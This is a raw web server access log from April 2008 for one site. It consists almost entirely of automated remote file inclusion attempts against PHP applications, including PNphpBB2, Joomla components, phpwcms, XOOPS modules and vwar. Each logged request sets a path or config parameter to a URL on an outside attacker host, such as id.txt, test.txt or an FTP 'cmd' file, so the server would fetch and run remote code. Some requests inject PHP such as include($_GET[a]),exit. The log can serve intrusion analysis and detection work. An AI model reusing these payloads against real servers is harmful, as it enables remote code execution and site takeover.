85.18.201.175 - - [07/Apr/2008:13:40:13 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:40:15 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:40:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:40:41 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:40:41 -0700] "GET /modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:40:57 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:40:57 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:13:41:00 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:13:41:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:41:26 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:41:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:41:33 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:41:33 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:41:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.12 - - [07/Apr/2008:13:41:50 -0700] "GET /logs/access_080130.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://borovskr.kaluga.ru/templates/calmsolution? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [07/Apr/2008:13:41:50 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://borovskr.kaluga.ru/templates/calmsolution? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.106.71.5 - - [07/Apr/2008:13:42:01 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.106.71.5 - - [07/Apr/2008:13:42:01 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:13:42:21 -0700] "GET /logs/access.log/index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:13:42:21 -0700] "GET /logs/index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.166.61.155 - - [07/Apr/2008:13:42:38 -0700] "GET //component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.phuskalar.pl////////images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
219.166.61.155 - - [07/Apr/2008:13:42:38 -0700] "GET /logs//component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.phuskalar.pl////////images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:42:57 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:42:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.12 - - [07/Apr/2008:13:43:02 -0700] "GET /logs/access_080312.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://borovskr.kaluga.ru/templates/calmsolution? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.18.201.175 - - [07/Apr/2008:13:43:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:43:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.123.223.221 - - [07/Apr/2008:13:43:53 -0700] "GET /logs/access_080324.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:44:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:44:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:44:42 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:44:43 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:44:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:44:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:45:16 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:45:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.24.107 - - [07/Apr/2008:13:45:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [07/Apr/2008:13:45:46 -0700] "GET //main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:45:52 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:45:52 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:45:52 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:13:45:54 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:13:45:55 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:13:45:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.171.66.229 - - [07/Apr/2008:13:46:11 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [07/Apr/2008:13:46:12 -0700] "GET //main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [07/Apr/2008:13:46:12 -0700] "GET /logs//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:46:38 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:46:38 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:46:39 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:46:40 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:46:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.218.240 - - [07/Apr/2008:13:46:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
62.75.218.240 - - [07/Apr/2008:13:46:44 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:46:47 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:46:48 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:46:48 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.171.66.229 - - [07/Apr/2008:13:46:58 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.218.240 - - [07/Apr/2008:13:47:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
62.75.218.240 - - [07/Apr/2008:13:47:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:47:04 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:47:04 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:47:04 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:47:08 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:47:10 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:47:11 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:47:11 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:13:47:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.235.216.127 - - [07/Apr/2008:13:47:14 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [07/Apr/2008:13:47:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:47:29 -0700] "GET //main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:47:29 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:47:29 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:47:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:13:47:37 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:13:47:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:13:47:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:47:47 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:47:48 -0700] "GET //main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:47:48 -0700] "GET /logs//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.0.180.70 - - [07/Apr/2008:13:47:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
210.0.180.70 - - [07/Apr/2008:13:47:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:48:16 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:48:23 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:48:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:48:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:48:34 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
84.123.223.221 - - [07/Apr/2008:13:48:43 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:48:47 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:13:48:47 -0700] "GET //main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.53.114.42 - - [07/Apr/2008:13:48:51 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [07/Apr/2008:13:48:53 -0700] "GET //?mosConfig_absolute_path=http://www.xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [07/Apr/2008:13:48:55 -0700] "GET /logs//?mosConfig_absolute_path=http://www.xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 200 42127 "-" "libwww-perl/5.76" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:13:48:57 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:13:48:58 -0700] "GET //main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:13:48:59 -0700] "GET /logs//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:49:01 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:49:02 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:49:02 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:49:23 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:49:24 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:49:25 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:49:28 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:49:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:49:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
